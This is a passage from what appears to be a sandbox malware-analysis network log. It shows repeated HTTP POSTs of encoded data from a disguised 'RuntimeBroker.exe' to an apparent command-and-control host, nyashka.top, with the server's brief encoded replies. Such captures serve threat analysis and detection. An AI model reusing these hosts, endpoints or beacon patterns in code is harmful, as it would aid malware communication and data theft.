                                                                                  Data Ascii: _RYRT@QY[_ZQY_XPW_]_WYST\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S./'E!##=+=,\(.+-?Z (7+_'_ &/&F$.Y/
                                                                                  Jan 11, 2025 06:44:35.923372030 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:36.050525904 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:35 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  97192.168.2.65713337.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:36.179792881 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  98192.168.2.65713437.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:36.417581081 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 1872
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:36.770828009 CET1872OUTData Raw: 5f 54 59 52 51 40 54 5f 5b 5f 5a 51 59 5e 58 53 57 5b 5d 5a 57 5e 53 5f 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _TYRQ@T_[_ZQY^XSW[]ZW^S_\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S._,'6- ^7 !>+<9^+-#X#,(!"#+_<#35Y/&F$.Y/
                                                                                  Jan 11, 2025 06:44:37.051211119 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:37.183163881 CET308INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:36 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 09 1d 26 55 29 25 3e 5a 31 05 0a 55 24 0a 2d 0e 2a 2e 3c 01 2b 3d 35 5f 33 5e 35 1a 25 58 2f 0d 24 5d 2d 5a 28 00 2e 19 32 3f 24 05 3a 1e 2b 5d 0c 13 22 59 23 3a 08 10 25 2c 2f 04 3d 3b 3f 5a 20 3f 35 00 2b 04 25 54 3c 3c 24 5f 3f 07 02 02 3f 39 2a 54 2e 28 0f 17 2e 56 2a 1e 20 3e 2b 52 0d 11 24 52 2b 03 39 54 2a 07 2b 15 23 28 3b 5a 24 03 00 50 25 54 32 57 33 2a 23 01 31 32 36 0f 33 1f 2d 12 32 15 36 5b 26 3f 21 55 35 22 23 54 2c 00 22 57 01 33 55 56
                                                                                  Data Ascii: &U)%>Z1U$-*.<+=5_3^5%X/$]-Z(.2?$:+]"Y#:%,/=;?Z ?5+%T<<$_??9*T.(.V* >+R$R+9T*+#(;Z$P%T2W3*#1263-26[&?!U5"#T,"W3UV


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  99192.168.2.65713537.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:36.548322916 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:36.895361900 CET2544OUTData Raw: 5a 56 59 57 54 45 54 50 5b 5f 5a 51 59 53 58 50 57 58 5d 5c 57 5d 53 5f 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZVYWTETP[_ZQYSXPWX]\W]S_\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.]/ 86.7735)?()+-74?/P 8W+:( %_;>&F$.Y/5
                                                                                  Jan 11, 2025 06:44:37.185903072 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:37.352355957 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:37 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  100192.168.2.65713637.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:37.481817007 CET257OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:44:37.838988066 CET2544OUTData Raw: 5a 57 59 54 54 45 51 5b 5b 5f 5a 51 59 53 58 56 57 50 5d 5b 57 5a 53 5e 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZWYTTEQ[[_ZQYSXVWP][WZS^\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-/$!- ^ 0==,_(:+<# 20*90#1,.&F$.Y/5
                                                                                  Jan 11, 2025 06:44:38.125365973 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:38.261291027 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:38 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  101192.168.2.65713737.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:38.451941013 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:38.801670074 CET2544OUTData Raw: 5f 5d 59 53 54 46 54 58 5b 5f 5a 51 59 50 58 56 57 5e 5d 5e 57 5c 53 5a 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _]YSTFTX[_ZQYPXVW^]^W\SZ\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S..306=<_"0\)-^<-=?=87, Q?98#08&F$.Y/
                                                                                  Jan 11, 2025 06:44:39.107403994 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:39.244941950 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:39 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  102192.168.2.65713837.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:39.370022058 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:39.723591089 CET2544OUTData Raw: 5a 56 59 52 54 44 51 59 5b 5f 5a 51 59 55 58 54 57 5f 5d 5d 57 58 53 59 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZVYRTDQY[_ZQYUXTW_]]WXSY\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-.3;5=$X#0:=4>=)[? /#W#(_;X46/.&F$.Y/-
                                                                                  Jan 11, 2025 06:44:40.002381086 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:40.135035992 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:39 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  103192.168.2.65713937.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:40.259021997 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:40.617530107 CET2544OUTData Raw: 5a 52 5c 56 54 45 54 5e 5b 5f 5a 51 59 53 58 51 57 59 5d 5d 57 5c 53 55 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZR\VTET^[_ZQYSXQWY]]W\SU\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-/ 0"$^"#*)(?=5+<4<# V*) 9.>&F$.Y/5
                                                                                  Jan 11, 2025 06:44:40.905994892 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:41.073771954 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:40 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  104192.168.2.65714037.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:41.205629110 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:41.551637888 CET2544OUTData Raw: 5a 50 59 52 51 42 54 51 5b 5f 5a 51 59 52 58 5f 57 50 5d 53 57 50 53 5a 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZPYRQBTQ[_ZQYRX_WP]SWPSZ\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.X;'5>(_ >-<X)[<'\4Z0 "/?9X#=,.&F$.Y/1
                                                                                  Jan 11, 2025 06:44:41.835292101 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:41.962363958 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:41 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  105192.168.2.65714137.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:42.094012022 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  106192.168.2.65714237.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:42.198781013 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 1872
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:42.551554918 CET1872OUTData Raw: 5a 56 59 50 54 46 54 5e 5b 5f 5a 51 59 54 58 53 57 50 5d 5f 57 50 53 5c 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZVYPTFT^[_ZQYTXSWP]_WPS\\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S._8<!=8##=>= _?"<-/Z7P!28?:4"0)\8&F$.Y/)
                                                                                  Jan 11, 2025 06:44:42.827688932 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:42.954541922 CET308INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:42 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 09 1d 26 11 3e 26 32 5c 25 28 2c 54 25 20 3a 56 29 5b 34 03 3d 03 2e 06 25 28 25 5c 27 2d 27 0e 30 05 00 00 3f 00 08 50 24 2f 3f 5d 39 24 2b 5d 0c 13 22 5f 34 2a 0b 01 32 5a 20 10 29 16 0d 5d 22 12 26 13 28 04 21 16 28 11 3f 01 28 17 3f 59 3f 03 3d 0b 2c 28 2e 04 3a 0e 2d 0e 23 3e 2b 52 0d 11 24 1e 3c 2e 39 56 3d 3e 3b 5f 21 38 09 10 27 13 26 56 31 21 39 0d 24 29 2c 12 26 1c 3e 09 30 0f 36 0d 26 28 2e 1c 32 06 29 56 36 32 23 54 2c 00 22 57 01 33 55 56
                                                                                  Data Ascii: &>&2\%(,T% :V)[4=.%(%\'-'0?P$/?]9$+]"_4*2Z )]"&(!(?(?Y?=,(.:-#>+R$<.9V=>;_!8'&V1!9$),&>06&(.2)V62#T,"W3UV


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  107192.168.2.65714337.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:42.323111057 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:42.676636934 CET2544OUTData Raw: 5a 51 5c 52 51 43 54 5f 5b 5f 5a 51 59 51 58 56 57 51 5d 5f 57 58 53 54 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZQ\RQCT_[_ZQYQXVWQ]_WXST\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-/0,! \7\>,X<-+?7, (<_443%;&F$.Y/=
                                                                                  Jan 11, 2025 06:44:42.972130060 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:43.106369019 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:42 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  108192.168.2.65714437.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:43.488631964 CET257OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:44:43.832822084 CET2544OUTData Raw: 5a 55 59 57 54 49 54 50 5b 5f 5a 51 59 50 58 55 57 5f 5d 5b 57 5d 53 5b 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZUYWTITP[_ZQYPXUW_][W]S[\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S..3$6>#" %\=[/+=+ 4Z3 ,?9?]" %\;.&F$.Y/
                                                                                  Jan 11, 2025 06:44:44.126199961 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:44.256167889 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:44 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  109192.168.2.65714537.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:44.387500048 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:44.739110947 CET2544OUTData Raw: 5a 52 5c 50 54 47 54 5c 5b 5f 5a 51 59 54 58 54 57 51 5d 58 57 50 53 5f 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZR\PTGT\[_ZQYTXTWQ]XWPS_\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.88#='#3:=<?>+ /< 1/(;^ V5;>&F$.Y/)
                                                                                  Jan 11, 2025 06:44:45.016611099 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:45.146462917 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:44 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  110192.168.2.65714637.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:45.273010969 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:45.629918098 CET2544OUTData Raw: 5f 52 59 53 51 44 51 5d 5b 5f 5a 51 59 55 58 50 57 5b 5d 59 57 59 53 5d 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _RYSQDQ][_ZQYUXPW[]YWYS]\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-/0#"<]"0**=/(>=(>'7,?W 8R(3Y 08&F$.Y/-
                                                                                  Jan 11, 2025 06:44:45.920058012 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:46.087923050 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:45 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  111192.168.2.65714737.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:46.253304958 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
